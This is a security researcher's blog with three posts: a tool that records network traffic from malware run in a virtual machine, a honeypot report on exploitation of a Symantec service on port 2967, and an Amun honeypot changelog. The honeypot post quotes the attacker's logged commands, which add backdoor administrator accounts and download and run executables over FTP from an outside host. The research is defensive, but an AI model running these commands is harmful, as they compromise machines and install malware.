Virus Blog

i was in the need of some pcap files of irc bot infected machines, unfortunatly they are not so easy to get. thus, i decided to write a little tool which automatically generates pcap traces for submitted samples.

the tool is devided into two parts. the first part is a little windows tcp server, capable of receiving binary data and executing it. this part runs in a virtual machines running windows as operating system. the second part is a short python script running on a linux host outside the virtual machine. it takes binary files from a directory and transmits them one by one to the virutal machine. while the virtual host runs the submitted binary the python script captures the network traffic and constructs the pcap file. after a predefined timeout, the python scripts sends a revert to snapshot to the virtual machine and sends the next binary.

as a result i have a little tool to automatically construct pcap files of infected machines running for a configurable time. currently i am constructing pcaps of malware running 5 minutes on the virutal machine.

The vulnerability in the Symantec Anti-virus/Client Security software listing on port 2967 is activly exploited as we can determine from the Amun honeypot log files.

Different hosts frequently exploit our emulated vulnerability and inject shellcode which instructs the client to connectback to the attacker, presenting a shell for further commands:

exploit 222.133.xxx.xxx:1786 -> xxx.xxx.129.106:2967 (SYMANTEC: cbacks://222.133.xxx.xxx:6000/)

Commands entered on in the shell instruct the victim to download additionally files via ftp:

net stop sharedaccess
net user guest active:yes
net user guest !!!@@@QQQaaa
net localgroup administrators guest /add
net user sb$ sb /add
net localgroup administrators sb$ /add
echo open 124.234.xxx.xxx>>ftp.txt
echo sb>>ftp.txt
echo sb>>ftp.txt
echo bin>>ftp.txt
echo get sx.exe>>ftp.txt
echo get qq.exe>>ftp.txt
echo get 3389.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
sx.exe
qq.exe
3389.exe -o 3389
3389.exe -r

The next Amun release is now available. Things that have changed:

Changes in v0.1.1:
	- fixed amun request handler to close finished connections
	- fixed submit-md5 modul to write in binary mode
	- fixed connectbackshell loading shellcodemanager correctly
	- fixed connectbackshell replying with prompt
	- fixed bindport replying with prompt
	- fixed http download to accept few bytes if download already started
	- added new unencrypted bindshellcode used to exploit the VERITAS vulnerability
	- added new plain tftp download regex found in asn1 exploit
	- added new vuln modul for port 2380
	- added ftp port range configuration
	- added debug option logging local ip exploits
	- added new stage shellcode for vuln-pnp module
	- added minimum shellcode size for vuln-upnp to avoid emule
	- added logging module for syslog
	- added logging module for email
	- added utility for quick shellcode checking (checkCode.py)
	- update regular expression ftp plaintext detection
	- modified bindport socket close behaviour
	- modified default timeout values in amun.conf
	- modified error message for not connected transports
	- modified http shellcode to allow urls without port